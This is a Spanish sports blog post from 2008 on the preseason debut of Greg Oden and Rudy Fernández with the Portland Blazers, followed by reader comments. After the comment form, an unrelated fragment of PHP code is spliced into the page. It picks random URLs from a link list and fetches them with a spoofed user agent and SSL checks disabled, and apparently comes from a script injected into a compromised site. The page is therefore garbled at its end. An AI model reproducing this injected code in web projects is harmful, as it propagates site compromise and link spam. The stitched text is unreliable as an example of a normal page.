Debutan Oden y Rudy

08 de October de 2008 por MagicJohnson32

Los Blazers entusiasmaron anoche al público del Rose Garden en el primer partido de preseason, que supuso el debut de Greg Oden y Rudy Fernández en la NBA. Ambos dejaron ante los Kings algunas muestras de lo que pueden ofrecer, y el ex Joventut levantó a los espectadores de sus asientos con algunas jugadas brillantes, incluidos un par de alley-oops lanzados por Sergio Rodríguez. El base canario fue uno de los mejores del partido, que se cerró con victoria local 81-110. Os dejamos el box-score del encuentro y un vídeo con un amplio resumen:

Comenta

7 comentarios a esta entrada

  1. Red Pèrill dice:
    #1

    Rudy no tiene límites, que cabrón!! Y Oden es una bestia, éste tio amrcará época… Sin duda Portland tiene muy buena pinta… por fin.

      Citar

  2. Viva_Dirk dice:
    #2

    Vaya plantilla estan montando los Blazers, los ya confirmados Roy y Aldridge, Oden tiene pinta de pivot dominador, Rudy que es un jugadorazo, Bayless que puede salir un All-Star o un revulsivo desde el banco, Outlaw, Webster, Przybilla, y luego jóvenes con todas las posibilidades como Batum o Sergio, aunque al canario no le den bola.

    Incluso con la duda del base y de si Rudy puede jugar de 3 me parecen equipo de play-offs.

      Citar

  3. TheDeerHunter dice:
    #3

    Aquí podemos admirar cómo hábilmente Magic, en su infinita sabiduría, nos desvía la atención de lo que ha supuesto la primera derrota de Lakers en pretemporada (1 de 1) y el NO-debut de su supuesto homónimo chino mononucleosico.

    De cosas interesantes (por decir algo) también podríamos hablar del buen comienzo de Artest con los Rockets, de los 26 tiros que ya se cascaron Gay&Mayo (el 30% de todo el equipo ¿los nuevos AI&Carmelo?), de la buena actuación de Blatche que ya augurábamos ayer (colgándome medallas YA), la resurrección de un Bargnani ¿motivado??…
    Durante los primeros días de preseason también pudimos ver la nueva y prometedora pareja interior de los Wolves (Al Jefferson+Kevin Love) o el debut de ¿MVP? Beasley…

    Volviendo a los Blazers… nunca pensé que iba a llegar a decir esto… pero esta temporada tiene pinta que va a ser alucinante verlos jugar

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    UNa pasada Rudy. Se lo pasan a pasar en grande. Me declaro anti-Oden desde ayer; esos tios que hacen mates y practicamente sólo hacen mates levantando las rodillas, practican el levantamiento de rodillas para desviar la atención de que son unos monotemas acojonantes

      Citar

  5. Sergio y Rudy, “the spanish connection” dice:
    #5
  6. Txusma dice:
    #6

    Increible partido de Rudy de nuevo hoy: 15 puntos, 6 rebotes, 6 asistencias y 6 robos!! (tb 6 perdidas todo hay q decirlo). La cuestion es q se le ve con confianza y siente q los demas (entrenador, aficion, jugadores…) tb confian en él lo que le permite jugar de momento sin presión y como a él le gusta y sabe hacerlo.
    Marc parece que se asienta como pivot titular en los Grizzlies al menos hasta q vuelva Milicic. El iraniano está jugando poquito asi q un rival menos.

      Citar

  7. TheDeerHunter dice:
    #7

    Hay que destacar el momento de Sergio.
    Su pesadilla de la temporada pasada, lejos de hundirle le han motivado más que nunca y según han dicho públicamente en Portland ha currado de lo lindo este verano y se le ve mejor que nunca… eso, por cierto, se le está notando en pretemporada (quitando alguna que otra pérdida de más que tuvo anoche)

    Se puede tener dos lecturas sobre el tema. Que lo están promocionando por si pueden librarse de él (que igual no sería del todo malo en cualquier caso) o que efectivamente está de bien como dicen (una noticia cojonuda)
    De momento me quiero quedar con lo segundo… y un base como Sergio con la batería de buenos jugadores que tiene a su alrededor puede dar un espectáculo acojonante, que seguro la afición de Portland sabrá valorar (aunque no sé si lo harán también los técnicos)
    Que no se descuide Blake… que los dos que vienen por detrás dan miedo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>